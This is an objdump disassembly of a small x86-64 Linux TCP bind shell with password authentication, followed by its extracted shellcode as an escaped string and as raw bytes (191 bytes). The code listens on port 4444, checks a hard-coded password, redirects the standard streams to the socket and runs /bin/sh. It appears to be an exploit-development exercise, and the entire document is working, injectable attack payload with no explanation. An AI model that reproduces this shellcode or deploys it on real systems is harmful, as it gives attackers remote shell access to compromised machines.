
tcp-bind-shell-auth-smaller.elf64:     file format elf64-x86-64


Disassembly of section .text:

0000000000400080 <_start>:
  400080:	4d 31 f6             	xor    r14,r14
  400083:	6a 02                	push   0x2
  400085:	41 58                	pop    r8
  400087:	6a 01                	push   0x1
  400089:	41 5d                	pop    r13
  40008b:	6a 10                	push   0x10
  40008d:	41 5a                	pop    r10
  40008f:	6a 04                	push   0x4
  400091:	41 5b                	pop    r11
  400093:	6a 29                	push   0x29
  400095:	58                   	pop    rax
  400096:	4c 89 c7             	mov    rdi,r8
  400099:	4c 89 ee             	mov    rsi,r13
  40009c:	99                   	cdq    
  40009d:	0f 05                	syscall 
  40009f:	48 89 c7             	mov    rdi,rax
  4000a2:	48 83 ec 08          	sub    rsp,0x8
  4000a6:	46 89 34 1c          	mov    DWORD PTR [rsp+r11*1],r14d
  4000aa:	66 42 c7 04 04 11 5c 	mov    WORD PTR [rsp+r8*1],0x5c11
  4000b1:	4b 8d 04 06          	lea    rax,[r14+r8*1]
  4000b5:	66 89 04 24          	mov    WORD PTR [rsp],ax
  4000b9:	6a 31                	push   0x31
  4000bb:	58                   	pop    rax
  4000bc:	48 89 e6             	mov    rsi,rsp
  4000bf:	4c 89 d2             	mov    rdx,r10
  4000c2:	0f 05                	syscall 
  4000c4:	6a 32                	push   0x32
  4000c6:	58                   	pop    rax
  4000c7:	4c 89 c6             	mov    rsi,r8
  4000ca:	0f 05                	syscall 
  4000cc:	6a 2b                	push   0x2b
  4000ce:	58                   	pop    rax
  4000cf:	4c 29 d4             	sub    rsp,r10
  4000d2:	48 89 e6             	mov    rsi,rsp
  4000d5:	4c 29 ec             	sub    rsp,r13
  4000d8:	44 88 14 24          	mov    BYTE PTR [rsp],r10b
  4000dc:	48 89 e2             	mov    rdx,rsp
  4000df:	0f 05                	syscall 
  4000e1:	49 89 c1             	mov    r9,rax
  4000e4:	6a 03                	push   0x3
  4000e6:	58                   	pop    rax
  4000e7:	0f 05                	syscall 

00000000004000e9 <read_pass>:
  4000e9:	4c 89 f0             	mov    rax,r14
  4000ec:	4c 89 cf             	mov    rdi,r9
  4000ef:	4c 89 da             	mov    rdx,r11
  4000f2:	48 29 d4             	sub    rsp,rdx
  4000f5:	48 89 e6             	mov    rsi,rsp
  4000f8:	0f 05                	syscall 
  4000fa:	48 b8 45 49 4e 21 4c 	movabs rax,0x4d54454c214e4945
  400101:	45 54 4d 
  400104:	48 89 f7             	mov    rdi,rsi
  400107:	48 af                	scas   rax,QWORD PTR es:[rdi]
  400109:	75 de                	jne    4000e9 <read_pass>
  40010b:	4d 89 c7             	mov    r15,r8

000000000040010e <loop_through_stdfds>:
  40010e:	4c 89 cf             	mov    rdi,r9
  400111:	6a 21                	push   0x21
  400113:	58                   	pop    rax
  400114:	4c 89 fe             	mov    rsi,r15
  400117:	0f 05                	syscall 
  400119:	49 ff cf             	dec    r15
  40011c:	79 f0                	jns    40010e <loop_through_stdfds>
  40011e:	4c 89 f2             	mov    rdx,r14
  400121:	41 56                	push   r14
  400123:	48 bb 2f 2f 62 69 6e 	movabs rbx,0x68732f6e69622f2f
  40012a:	2f 73 68 
  40012d:	53                   	push   rbx
  40012e:	48 89 e7             	mov    rdi,rsp
  400131:	41 56                	push   r14
  400133:	48 89 e2             	mov    rdx,rsp
  400136:	57                   	push   rdi
  400137:	48 89 e6             	mov    rsi,rsp
  40013a:	6a 3b                	push   0x3b
  40013c:	58                   	pop    rax
  40013d:	0f 05                	syscall 
===================================
SHELLCODE:
\x4d\x31\xf6\x6a\x02\x41\x58\x6a\x01\x41\x5d\x6a\x10\x41\x5a\x6a\x04\x41\x5b\x6a\x29\x58\x4c\x89\xc7\x4c\x89\xee\x99\x0f\x05\x48\x89\xc7\x48\x83\xec\x08\x46\x89\x34\x1c\x66\x42\xc7\x04\x04\x11\x5c\x4b\x8d\x04\x06\x66\x89\x04\x24\x6a\x31\x58\x48\x89\xe6\x4c\x89\xd2\x0f\x05\x6a\x32\x58\x4c\x89\xc6\x0f\x05\x6a\x2b\x58\x4c\x29\xd4\x48\x89\xe6\x4c\x29\xec\x44\x88\x14\x24\x48\x89\xe2\x0f\x05\x49\x89\xc1\x6a\x03\x58\x0f\x05\x4c\x89\xf0\x4c\x89\xcf\x4c\x89\xda\x48\x29\xd4\x48\x89\xe6\x0f\x05\x48\xb8\x45\x49\x4e\x21\x4c\x45\x54\x4d\x48\x89\xf7\x48\xaf\x75\xde\x4d\x89\xc7\x4c\x89\xcf\x6a\x21\x58\x4c\x89\xfe\x0f\x05\x49\xff\xcf\x79\xf0\x4c\x89\xf2\x41\x56\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x41\x56\x48\x89\xe2\x57\x48\x89\xe6\x6a\x3b\x58\x0f\x05
-- -- -- -- --
SHELLCODE SIZE (bytes): 191
-- -- -- -- --
SHELLCODE BYTECODE: 
 4d 31 f6 6a 02 41 58 6a 01 41 5d 6a 10 41 5a 6a 04 41 5b 6a 29 58 4c 89 c7 4c 89 ee 99 0f 05 48 89 c7 48 83 ec 08 46 89 34 1c 66 42 c7 04 04 11 5c 4b 8d 04 06 66 89 04 24 6a 31 58 48 89 e6 4c 89 d2 0f 05 6a 32 58 4c 89 c6 0f 05 6a 2b 58 4c 29 d4 48 89 e6 4c 29 ec 44 88 14 24 48 89 e2 0f 05 49 89 c1 6a 03 58 0f 05 4c 89 f0 4c 89 cf 4c 89 da 48 29 d4 48 89 e6 0f 05 48 b8 45 49 4e 21 4c 45 54 4d 48 89 f7 48 af 75 de 4d 89 c7 4c 89 cf 6a 21 58 4c 89 fe 0f 05 49 ff cf 79 f0 4c 89 f2 41 56 48 bb 2f 2f 62 69 6e 2f 73 68 53 48 89 e7 41 56 48 89 e2 57 48 89 e6 6a 3b 58 0f 05
-- -- -- -- --
